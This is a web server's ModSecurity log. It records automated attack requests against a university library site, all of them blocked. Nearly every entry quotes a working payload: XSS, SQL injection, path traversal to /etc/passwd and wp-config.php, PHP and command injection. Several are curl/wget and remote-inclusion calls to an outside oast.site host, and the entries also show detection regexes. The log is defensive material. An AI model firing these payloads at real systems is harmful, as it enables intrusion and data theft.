[Tue Aug 29 11:41:24.365670 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAYf-RgAAAAD"]
[Tue Aug 29 11:41:24.377536 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAc2dRoAAAAN"]
[Tue Aug 29 11:41:24.592884 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAc4EocAAAAP"]
[Tue Aug 29 11:41:25.374999 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAYf-SIAAAAD"]
[Tue Aug 29 11:41:25.535088 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAQkBcsAAAAC"]
[Tue Aug 29 11:41:26.357555 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcoNWgAAAAF"]
[Tue Aug 29 11:41:26.424453 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcbSGQAAAAv"]
[Tue Aug 29 11:41:26.637183 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAc2dTQAAAAN"]
[Tue Aug 29 11:41:27.507388 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcoNXAAAAAF"]
[Tue Aug 29 11:41:28.422936 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7e1juetr57kjt.oast.site found within TX:1: cjmnbitjmimt14dgn26g7e1juetr57kjt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAQkBeIAAAAC"]
[Tue Aug 29 11:41:30.395631 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gmxcuzw7cqepog.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcbSHsAAAAv"]
[Tue Aug 29 11:41:30.575555 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAc0NhkAAAAM"]
[Tue Aug 29 11:41:32.360157 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAQSWp0AAAA0"]
[Tue Aug 29 11:41:32.549654 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcrilEAAAAB"]
[Tue Aug 29 11:41:33.482648 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcoNY4AAAAF"]
[Tue Aug 29 11:41:35.431429 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAcoNZwAAAAF"]
[Tue Aug 29 11:41:36.400239 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcqJQ0AAAAG"]
[Tue Aug 29 11:41:36.504965 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjUAAAAM"]
[Tue Aug 29 11:41:38.368707 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAc8A2cAAAAK"]
[Tue Aug 29 11:41:39.481235 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAXHqEUAAAAT"]
[Tue Aug 29 11:41:40.506844 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAc8A3YAAAAK"]
[Tue Aug 29 11:41:42.414915 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcbSMAAAAAv"]
[Tue Aug 29 11:41:45.392552 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g5zcrpt9p51uhq.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAc8A5MAAAAK"]
[Tue Aug 29 11:41:46.379178 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAdECToAAAAW"]
[Tue Aug 29 11:41:49.398237 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAc92swAAAAD"]
[Tue Aug 29 11:41:56.375197 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdECXMAAAAW"]
[Tue Aug 29 11:41:57.464158 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAc0No4AAAAM"]
[Tue Aug 29 11:41:58.394849 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAdUcxUAAAAZ"]
[Tue Aug 29 11:42:00.376317 2023] [:error] [pid 1864] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g39mb3t1esy4c6.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g39mb3t1esy4c6.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdIZCkAAAAG"]
[Tue Aug 29 11:42:01.406435 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdV7YUAAAAa"]
[Tue Aug 29 11:42:04.365402 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdV7YoAAAAa"]
